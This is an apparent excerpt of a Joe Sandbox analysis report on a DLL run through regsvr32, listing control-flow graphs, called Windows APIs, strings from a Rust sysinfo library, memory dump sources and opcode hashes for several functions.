                                                                    control_flow_graph 2432 7ffdfb20f280-7ffdfb20f298 2433 7ffdfb20f29e-7ffdfb20f2dc call 7ffdfb245580 GetSystemInfo 2432->2433 2434 7ffdfb20fa60-7ffdfb20fa73 2432->2434 2437 7ffdfb20f470-7ffdfb20f478 2433->2437 2438 7ffdfb20f2e2-7ffdfb20f305 call 7ffdfb20a8d0 2433->2438 2440 7ffdfb20f518-7ffdfb20f546 call 7ffdfb20a8d0 2437->2440 2443 7ffdfb20fad8-7ffdfb20fae2 call 7ffdfb2deab0 2438->2443 2444 7ffdfb20f30b-7ffdfb20f32d 2438->2444 2448 7ffdfb20fab8-7ffdfb20fac7 call 7ffdfb2deab0 2440->2448 2449 7ffdfb20f54c-7ffdfb20f594 call 7ffdfb20fde0 * 3 2440->2449 2451 7ffdfb20fae7-7ffdfb20faf6 call 7ffdfb2deab0 2443->2451 2447 7ffdfb20f330-7ffdfb20f354 2444->2447 2452 7ffdfb20f360-7ffdfb20f388 2447->2452 2453 7ffdfb20f356-7ffdfb20f35b call 7ffdfb228760 2447->2453 2463 7ffdfb20fb28-7ffdfb20fcc9 2448->2463 2478 7ffdfb20f596-7ffdfb20f598 2449->2478 2479 7ffdfb20f5bc-7ffdfb20f5d1 call 7ffdfb2f2390 2449->2479 2451->2463 2455 7ffdfb20f392-7ffdfb20f3af call 7ffdfb20a8d0 2452->2455 2456 7ffdfb20f38a-7ffdfb20f390 2452->2456 2453->2452 2455->2451 2469 7ffdfb20f3b5-7ffdfb20f3d5 2455->2469 2456->2447 2456->2455 2471 7ffdfb20fcd3-7ffdfb20fd18 call 7ffdfb20a8e0 call 7ffdfb302850 call 7ffdfb2eba00 call 7ffdfb20f280 2463->2471 2472 7ffdfb20fccb-7ffdfb20fcce call 7ffdfb302850 2463->2472 2474 7ffdfb20f47d-7ffdfb20f484 2469->2474 2475 7ffdfb20f3db-7ffdfb20f42d call 7ffdfb20fde0 * 4 2469->2475 2472->2471 2481 7ffdfb20f4b7 2474->2481 2546 7ffdfb20f430-7ffdfb20f434 2475->2546 2484 7ffdfb20f5a0-7ffdfb20f5a4 2478->2484 2499 7ffdfb20f5d3-7ffdfb20f5d8 2479->2499 2500 7ffdfb20f5f5-7ffdfb20f600 2479->2500 2482 7ffdfb20f4ba-7ffdfb20f4d2 call 7ffdfb2f2390 2481->2482 2503 7ffdfb20f6f3-7ffdfb20f6fe 2482->2503 2504 7ffdfb20f4d8-7ffdfb20f4e8 2482->2504 2489 7ffdfb20f5b0-7ffdfb20f5b3 2484->2489 2490 7ffdfb20f5a6-7ffdfb20f5ac 2484->2490 2497 7ffdfb20fb07-7ffdfb20fb19 call 7ffdfb2f2090 2489->2497 2498 7ffdfb20f5b9 2489->2498 2490->2484 2495 7ffdfb20f5ae 2490->2495 2495->2479 2497->2463 2498->2479 2508 7ffdfb20f617-7ffdfb20f61e 2499->2508 2509 7ffdfb20f5da-7ffdfb20f5f3 2499->2509 2501 7ffdfb20f606-7ffdfb20f60e 2500->2501 2502 7ffdfb20faf8 2500->2502 2510 7ffdfb20f624-7ffdfb20f63e call 7ffdfb20a8d0 2501->2510 2512 7ffdfb20f610-7ffdfb20f615 2501->2512 2511 7ffdfb20fafa-7ffdfb20fb05 call 7ffdfb2deab0 2502->2511 2516 7ffdfb20f704-7ffdfb20f70c 2503->2516 2517 7ffdfb20fb1b 2503->2517 2513 7ffdfb20f4fa-7ffdfb20f502 2504->2513 2514 7ffdfb20f4ea-7ffdfb20f4f5 call 7ffdfb20a8e0 2504->2514 2508->2510 2509->2510 2510->2511 2541 7ffdfb20f644 2510->2541 2511->2463 2521 7ffdfb20f647-7ffdfb20f65d memcpy 2512->2521 2513->2440 2527 7ffdfb20f504-7ffdfb20f513 call 7ffdfb20a8e0 2513->2527 2514->2513 2524 7ffdfb20f712-7ffdfb20f72b call 7ffdfb20a8d0 2516->2524 2525 7ffdfb20fa74 2516->2525 2526 7ffdfb20fb1d-7ffdfb20fb23 call 7ffdfb2deab0 2517->2526 2532 7ffdfb20f66f-7ffdfb20f6ab 2521->2532 2533 7ffdfb20f65f-7ffdfb20f66a call 7ffdfb20a8e0 2521->2533 2524->2526 2549 7ffdfb20f731-7ffdfb20f734 2524->2549 2539 7ffdfb20fa7a-7ffdfb20fa90 memcpy 2525->2539 2526->2463 2527->2440 2544 7ffdfb20f6ad-7ffdfb20f6bd call 7ffdfb20fe90 2532->2544 2545 7ffdfb20f6c2-7ffdfb20f6c5 2532->2545 2533->2532 2539->2514 2540 7ffdfb20fa96 2539->2540 2540->2513 2541->2521 2562 7ffdfb20f756-7ffdfb20f772 call 7ffdfb20a8d0 2544->2562 2547 7ffdfb20f6c7-7ffdfb20f6df call 7ffdfb20a900 2545->2547 2548 7ffdfb20f739 2545->2548 2551 7ffdfb20f486-7ffdfb20f493 2546->2551 2552 7ffdfb20f436-7ffdfb20f439 2546->2552 2557 7ffdfb20f73e-7ffdfb20f74e 2547->2557 2564 7ffdfb20f6e1-7ffdfb20f6ee call 7ffdfb2deab0 2547->2564 2548->2557 2549->2539 2555 7ffdfb20f4b5 2551->2555 2556 7ffdfb20f495-7ffdfb20f498 2551->2556 2552->2551 2553 7ffdfb20f43b-7ffdfb20f46e call 7ffdfb20fde0 * 4 2552->2553 2553->2546 2555->2481 2561 7ffdfb20f4a0-7ffdfb20f4a5 2556->2561 2557->2562 2565 7ffdfb20fa9b-7ffdfb20fa9e 2561->2565 2566 7ffdfb20f4ab-7ffdfb20f4b1 2561->2566 2573 7ffdfb20f778-7ffdfb20f7ac 2562->2573 2574 7ffdfb20fac9-7ffdfb20fad6 call 7ffdfb2deab0 2562->2574 2564->2463 2565->2482 2569 7ffdfb20faa4-7ffdfb20fab6 call 7ffdfb2f2090 2565->2569 2566->2561 2572 7ffdfb20f4b3 2566->2572 2569->2463 2572->2481 2578 7ffdfb20f7b2-7ffdfb20f7cd 2573->2578 2579 7ffdfb20f988-7ffdfb20f9c8 2573->2579 2574->2463 2583 7ffdfb20f85e-7ffdfb20f970 call 7ffdfb2e0010 call 7ffdfb2e2340 * 2 2578->2583 2586 7ffdfb20f9de-7ffdfb20f9e9 2579->2586 2587 7ffdfb20f9ca-7ffdfb20f9d9 call 7ffdfb20a8e0 2579->2587 2608 7ffdfb20f7e0-7ffdfb20f858 2583->2608 2609 7ffdfb20f976-7ffdfb20f983 call 7ffdfb228130 2583->2609 2589 7ffdfb20f9fe-7ffdfb20fa09 2586->2589 2590 7ffdfb20f9eb-7ffdfb20f9f9 call 7ffdfb20a8e0 2586->2590 2587->2586 2594 7ffdfb20fa1e-7ffdfb20fa2c call 7ffdfb224840 2589->2594 2595 7ffdfb20fa0b-7ffdfb20fa19 call 7ffdfb20a8e0 2589->2595 2590->2589 2604 7ffdfb20fa2e-7ffdfb20fa3c call 7ffdfb20a8e0 2594->2604 2605 7ffdfb20fa41-7ffdfb20fa5d 2594->2605 2595->2594 2604->2605 2605->2434 2608->2579 2608->2583 2609->2608
                                                                    APIs
                                                                    Strings
                                                                    • 0, xrefs: 00007FFDFB20F3B5
                                                                    • unknownARM x64C:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\cpu.rs, xrefs: 00007FFDFB20F617
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$InfoSystem
                                                                    • String ID: 0$unknownARM x64C:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\cpu.rs
                                                                    • API String ID: 1915069931-2550612777
                                                                    • Opcode ID: d6a2272041e40b724aa20a5dacbb8995ec4afb1dcaeccf49d007e1a5f260c61b
                                                                    • Instruction ID: 020b465ef59ffacb435307f432f2c08f4db693b68906b08153f147add0df0cde
                                                                    • Opcode Fuzzy Hash: d6a2272041e40b724aa20a5dacbb8995ec4afb1dcaeccf49d007e1a5f260c61b
                                                                    • Instruction Fuzzy Hash: 24326022B0E6C281E7609B11A460BAAA761FB857C0F588135DEED47BEEDF7CE5458700
                                                                    Function 00007FFDFB201A43 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 1196COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$GlobalInfoMemoryPerformanceStatusmemcmp
                                                                    • String ID: 2Pz\
                                                                    • API String ID: 814616673-2698464549
                                                                    • Opcode ID: 3a482ac07fc9ee52deb5603def4d416b97b7fdd24e7918671344e7f49f44414d
                                                                    • Instruction ID: 05e85cb040d05d5f8c9b1370eb6ea41d39541d51722f689a09a48b5cc2b19548
                                                                    • Opcode Fuzzy Hash: 3a482ac07fc9ee52deb5603def4d416b97b7fdd24e7918671344e7f49f44414d
                                                                    • Instruction Fuzzy Hash: 36B2426670968286DB20DB11A45066B7BA1FBCDBC8F444235EEDD83BADDF3DD6018B04
                                                                    Function 00007FFDFB220B68 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88nativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InformationQuerySystem
                                                                    • String ID: yW
                                                                    • API String ID: 3562636166-791297507
                                                                    • Opcode ID: 52d47727048697872374a12b89f7e4276d110ab87487e43d9b766e2cb48f168f
                                                                    • Instruction ID: 2e0485a66261c192e45394b6a8960b820679766ba9fe9f4ed5a280282feec4e2
                                                                    • Opcode Fuzzy Hash: 52d47727048697872374a12b89f7e4276d110ab87487e43d9b766e2cb48f168f
                                                                    • Instruction Fuzzy Hash: 7D31906270EB8285FB619B01A420BABB691EB847D4F944535DE9CC7BEDCF3DD0848B00
                                                                    Function 00007FFDFB28C9E0 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 144d6ee9d57e6719ed89032d55413ed7ca63a30b44577e094033f07e3ff41f05
                                                                    • Instruction ID: 36b19964d8be72c328824149becd53dab0610fa38a04fb5b169c6cf5bca005ff
                                                                    • Opcode Fuzzy Hash: 144d6ee9d57e6719ed89032d55413ed7ca63a30b44577e094033f07e3ff41f05
                                                                    • Instruction Fuzzy Hash: C0E0D821BA48D5DDFF06EB749C169F463B1BF90358F480611E94D05154BE38C3D1C300
                                                                    Function 00007FFDFB2A0B20 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 272synchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1742 7ffdfb2a0b20-7ffdfb2a0b6b call 7ffdfb2afc30 1745 7ffdfb2a0d2f-7ffdfb2a0d36 1742->1745 1746 7ffdfb2a0b71-7ffdfb2a0ba0 1742->1746 1749 7ffdfb2a0d57-7ffdfb2a0d6d 1745->1749 1747 7ffdfb2a0ba7-7ffdfb2a0bf7 1746->1747 1748 7ffdfb2a0ba2 CloseHandle 1746->1748 1750 7ffdfb2a0c46-7ffdfb2a0c48 1747->1750 1751 7ffdfb2a0bf9-7ffdfb2a0bfb 1747->1751 1748->1747 1754 7ffdfb2a0c4a-7ffdfb2a0c5d call 7ffdfb2ab860 1750->1754 1755 7ffdfb2a0c89-7ffdfb2a0c98 WaitForSingleObject 1750->1755 1752 7ffdfb2a0c68-7ffdfb2a0c7b call 7ffdfb2ab860 1751->1752 1753 7ffdfb2a0bfd-7ffdfb2a0c0b call 7ffdfb2aec20 1751->1753 1767 7ffdfb2a0d9c-7ffdfb2a0dc3 call 7ffdfb2ebcd0 1752->1767 1768 7ffdfb2a0c81 1752->1768 1762 7ffdfb2a0c10-7ffdfb2a0c13 1753->1762 1774 7ffdfb2a0d6e-7ffdfb2a0d9a call 7ffdfb2ebcd0 1754->1774 1775 7ffdfb2a0c63-7ffdfb2a0c66 1754->1775 1758 7ffdfb2a0c9a-7ffdfb2a0ca9 GetLastError 1755->1758 1759 7ffdfb2a0cdf-7ffdfb2a0cf4 call 7ffdfb30213c 1755->1759 1763 7ffdfb2a0cba-7ffdfb2a0cc5 1758->1763 1764 7ffdfb2a0cab-7ffdfb2a0cb5 call 7ffdfb20a8e0 1758->1764 1759->1758 1776 7ffdfb2a0cf6-7ffdfb2a0d12 1759->1776 1762->1755 1769 7ffdfb2a0c15-7ffdfb2a0c41 call 7ffdfb2ebcd0 1762->1769 1771 7ffdfb2a0cd6-7ffdfb2a0cdd 1763->1771 1772 7ffdfb2a0cc7-7ffdfb2a0cd1 call 7ffdfb20a8e0 1763->1772 1764->1763 1787 7ffdfb2a0dc8-7ffdfb2a0e2a call 7ffdfb26c5e0 CloseHandle 1767->1787 1777 7ffdfb2a0c84 CloseHandle 1768->1777 1769->1787 1782 7ffdfb2a0d16-7ffdfb2a0d2a CloseHandle * 2 1771->1782 1772->1771 1774->1787 1775->1777 1776->1782 1777->1755 1783 7ffdfb2a0d38-7ffdfb2a0d53 1782->1783 1784 7ffdfb2a0d2c 1782->1784 1783->1749 1784->1745 1792 7ffdfb2a0e2c-7ffdfb2a0e36 call 7ffdfb20a8e0 1787->1792 1793 7ffdfb2a0e3b-7ffdfb2a0e42 1787->1793 1792->1793 1795 7ffdfb2a0e44-7ffdfb2a0e4e call 7ffdfb20a8e0 1793->1795 1796 7ffdfb2a0e53-7ffdfb2a0ebb call 7ffdfb26ce80 CloseHandle * 2 call 7ffdfb302850 call 7ffdfb2afc30 1793->1796 1795->1796 1804 7ffdfb2a0ecc-7ffdfb2a0ee3 1796->1804 1805 7ffdfb2a0ebd-7ffdfb2a0ec7 1796->1805 1807 7ffdfb2a0ee5-7ffdfb2a0ee9 CloseHandle 1804->1807 1808 7ffdfb2a0eee-7ffdfb2a0efd WaitForSingleObject 1804->1808 1806 7ffdfb2a0f64-7ffdfb2a0f77 1805->1806 1807->1808 1809 7ffdfb2a0f17-7ffdfb2a0f2c GetExitCodeProcess 1808->1809 1810 7ffdfb2a0eff-7ffdfb2a0f15 GetLastError 1808->1810 1809->1810 1812 7ffdfb2a0f2e-7ffdfb2a0f34 1809->1812 1811 7ffdfb2a0f36-7ffdfb2a0f4c CloseHandle * 2 1810->1811 1813 7ffdfb2a0f56-7ffdfb2a0f5a 1811->1813 1814 7ffdfb2a0f4e-7ffdfb2a0f51 CloseHandle 1811->1814 1812->1811 1813->1806 1815 7ffdfb2a0f5c-7ffdfb2a0f5f CloseHandle 1813->1815 1814->1813 1815->1806
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                    • String ID: called `Result::unwrap()` on an `Err` value
                                                                    • API String ID: 1454876536-2333694755
                                                                    • Opcode ID: 685dcc371962ab0a9f66f19c316897fb5882e323e4b61a22f2613bda1f7e35e7
                                                                    • Instruction ID: b65060f9f7435d31af299ee2618bcf39e218cdb4717c79a1c29d636237224678
                                                                    • Opcode Fuzzy Hash: 685dcc371962ab0a9f66f19c316897fb5882e323e4b61a22f2613bda1f7e35e7
                                                                    • Instruction Fuzzy Hash: B5C15D32B09A4399EB10AF61D860BED27A4FB44788F144531EE6D96AEDDF38E585C340
                                                                    Function 00007FFDFB25ABD0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 180COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2363 7ffdfb25abd0-7ffdfb25cacf 2365 7ffdfb25cad5-7ffdfb25cae2 TlsGetValue 2363->2365 2366 7ffdfb25cb67-7ffdfb25cb79 call 7ffdfb2ba190 call 7ffdfb3023a4 2363->2366 2368 7ffdfb25cae4 2365->2368 2369 7ffdfb25cb5f-7ffdfb25cb66 2365->2369 2366->2368 2379 7ffdfb25cb7f 2366->2379 2371 7ffdfb25cb00-7ffdfb25cb02 2368->2371 2372 7ffdfb25cae6-7ffdfb25cae9 2368->2372 2371->2369 2374 7ffdfb25cb04 2372->2374 2375 7ffdfb25caeb-7ffdfb25caf8 2372->2375 2378 7ffdfb25cb06-7ffdfb25cb22 call 7ffdfb20a8d0 2374->2378 2377 7ffdfb25cafa-7ffdfb25cafe 2375->2377 2375->2378 2377->2378 2382 7ffdfb25cb81-7ffdfb25cbaf call 7ffdfb2dead0 2378->2382 2383 7ffdfb25cb24-7ffdfb25cb47 TlsGetValue TlsSetValue 2378->2383 2379->2369 2390 7ffdfb25cc83-7ffdfb25cc95 call 7ffdfb2ba190 TlsGetValue 2382->2390 2391 7ffdfb25cbb5-7ffdfb25cbc2 TlsGetValue 2382->2391 2384 7ffdfb25cb49-7ffdfb25cb57 call 7ffdfb20a8e0 2383->2384 2385 7ffdfb25cb5c 2383->2385 2384->2385 2385->2369 2393 7ffdfb25cbc8 2390->2393 2400 7ffdfb25cc9b 2390->2400 2392 7ffdfb25cc7b-7ffdfb25cc82 2391->2392 2391->2393 2395 7ffdfb25cbce-7ffdfb25cbd1 2393->2395 2396 7ffdfb25cc79 2393->2396 2398 7ffdfb25cbe3-7ffdfb25cbeb call 7ffdfb263090 call 7ffdfb262e00 2395->2398 2399 7ffdfb25cbd3-7ffdfb25cbe1 2395->2399 2396->2392 2407 7ffdfb25cbf0 2398->2407 2399->2398 2401 7ffdfb25cbf3-7ffdfb25cc0f call 7ffdfb20a8d0 2399->2401 2400->2392 2408 7ffdfb25cc9d-7ffdfb25ccec call 7ffdfb2dead0 call 7ffdfb20a8e0 call 7ffdfb302850 2401->2408 2409 7ffdfb25cc15-7ffdfb25cc38 TlsGetValue TlsSetValue 2401->2409 2407->2401 2422 7ffdfb25ccee-7ffdfb25ccf1 call 7ffdfb264290 2408->2422 2423 7ffdfb25ccf6-7ffdfb2f119a call 7ffdfb302850 call 7ffdfb2eba00 2408->2423 2411 7ffdfb25cc74-7ffdfb25cc77 2409->2411 2412 7ffdfb25cc3a-7ffdfb25cc5a 2409->2412 2411->2392 2414 7ffdfb25cc61-7ffdfb25cc6f call 7ffdfb20a8e0 2412->2414 2415 7ffdfb25cc5c call 7ffdfb264290 2412->2415 2414->2411 2415->2414 2422->2423 2430 7ffdfb2f119c-7ffdfb2f11ac 2423->2430 2431 7ffdfb2f11b2-7ffdfb2f11c2 2423->2431 2430->2431
                                                                    APIs
                                                                    • TlsGetValue.KERNEL32(?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CAD9
                                                                    • TlsGetValue.KERNEL32(?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CB2F
                                                                    • TlsSetValue.KERNEL32(?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CB3F
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CBB9
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC20
                                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC30
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC8C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: falsetrue
                                                                    • API String ID: 3702945584-2583396087
                                                                    • Opcode ID: 0a68dd2e9f831320d73f1ffa4997c7c3273a9ec5a24f8e071783848aa26efe7f
                                                                    • Instruction ID: 8caf11dd877188ed00fb9f0defcbb66359eca6bd80857e60855a92d5c9248033
                                                                    • Opcode Fuzzy Hash: 0a68dd2e9f831320d73f1ffa4997c7c3273a9ec5a24f8e071783848aa26efe7f
                                                                    • Instruction Fuzzy Hash: B061B022F0F55742FB5476198530BBD56D1AF45BC4F088434CEAD8BBEEEE6DA8428380
                                                                    Function 00007FFDFB2A8350 Relevance: 9.2, APIs: 6, Instructions: 180COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2612 7ffdfb2a8350-7ffdfb2a8387 call 7ffdfb2b64b0 2615 7ffdfb2a8389-7ffdfb2a838e 2612->2615 2616 7ffdfb2a8393-7ffdfb2a83cd call 7ffdfb2b8aa0 2612->2616 2617 7ffdfb2a856b-7ffdfb2a857a 2615->2617 2620 7ffdfb2a83d7-7ffdfb2a83e1 2616->2620 2621 7ffdfb2a83cf-7ffdfb2a83d2 2616->2621 2622 7ffdfb2a83e9-7ffdfb2a83eb 2620->2622 2623 7ffdfb2a83e3-7ffdfb2a83e5 2620->2623 2621->2617 2625 7ffdfb2a83ed-7ffdfb2a83f1 2622->2625 2626 7ffdfb2a8448-7ffdfb2a844c 2622->2626 2624 7ffdfb2a83e7 2623->2624 2623->2625 2627 7ffdfb2a83fd-7ffdfb2a8406 2624->2627 2625->2627 2628 7ffdfb2a83f3-7ffdfb2a83f7 2625->2628 2629 7ffdfb2a853d-7ffdfb2a854a 2626->2629 2630 7ffdfb2a8452-7ffdfb2a8456 2626->2630 2633 7ffdfb2a8408-7ffdfb2a8411 2627->2633 2634 7ffdfb2a841d-7ffdfb2a8420 2627->2634 2628->2627 2628->2629 2629->2617 2632 7ffdfb2a854c-7ffdfb2a8566 call 7ffdfb20a8e0 2629->2632 2630->2629 2631 7ffdfb2a845c-7ffdfb2a8460 2630->2631 2631->2627 2635 7ffdfb2a8462 2631->2635 2632->2617 2637 7ffdfb2a8413-7ffdfb2a8416 2633->2637 2638 7ffdfb2a8422-7ffdfb2a842b 2633->2638 2634->2638 2639 7ffdfb2a8467-7ffdfb2a8477 2634->2639 2635->2629 2640 7ffdfb2a8418-7ffdfb2a841b 2637->2640 2643 7ffdfb2a842d-7ffdfb2a8431 2637->2643 2638->2640 2638->2643 2639->2640 2641 7ffdfb2a8479 2639->2641 2644 7ffdfb2a8497-7ffdfb2a84cf CreateFileW 2640->2644 2641->2643 2645 7ffdfb2a847b-7ffdfb2a847d 2643->2645 2646 7ffdfb2a8433-7ffdfb2a8446 2643->2646 2649 7ffdfb2a84d5-7ffdfb2a84dc 2644->2649 2650 7ffdfb2a857b-7ffdfb2a8593 GetLastError 2644->2650 2647 7ffdfb2a848a-7ffdfb2a848c 2645->2647 2648 7ffdfb2a847f-7ffdfb2a8486 2645->2648 2646->2644 2647->2629 2652 7ffdfb2a8492 2647->2652 2651 7ffdfb2a8488 2648->2651 2648->2652 2655 7ffdfb2a8517-7ffdfb2a851c 2649->2655 2656 7ffdfb2a84de-7ffdfb2a84e2 2649->2656 2653 7ffdfb2a8595 2650->2653 2654 7ffdfb2a851e-7ffdfb2a8535 call 7ffdfb20a8e0 2650->2654 2651->2644 